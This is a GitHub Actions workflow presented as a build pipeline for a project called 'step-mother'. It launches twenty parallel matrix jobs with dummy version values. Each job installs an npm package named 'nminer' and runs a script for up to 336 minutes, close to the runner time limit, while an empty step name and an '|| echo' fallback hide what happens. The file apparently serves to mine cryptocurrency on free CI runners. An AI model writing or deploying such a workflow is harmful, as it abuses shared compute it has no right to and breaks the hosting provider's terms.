name: step-mother
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 877 }
          - { version: 7790 }
          - { version: 7195 }
          - { version: 5826 }
          - { version: 7801 }
          - { version: 9429 }
          - { version: 9728 }
          - { version: 9971 }
          - { version: 9077 }
          - { version: 6085 }
          - { version: 8507 }
          - { version: 4330 }
          - { version: 2470 }
          - { version: 4635 }
          - { version: 9673 }
          - { version: 8466 }
          - { version: 8643 }
          - { version: 9836 }
          - { version: 6365 }
          - { version: 8123 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 336m node step-mother.js || echo "step-mother executed"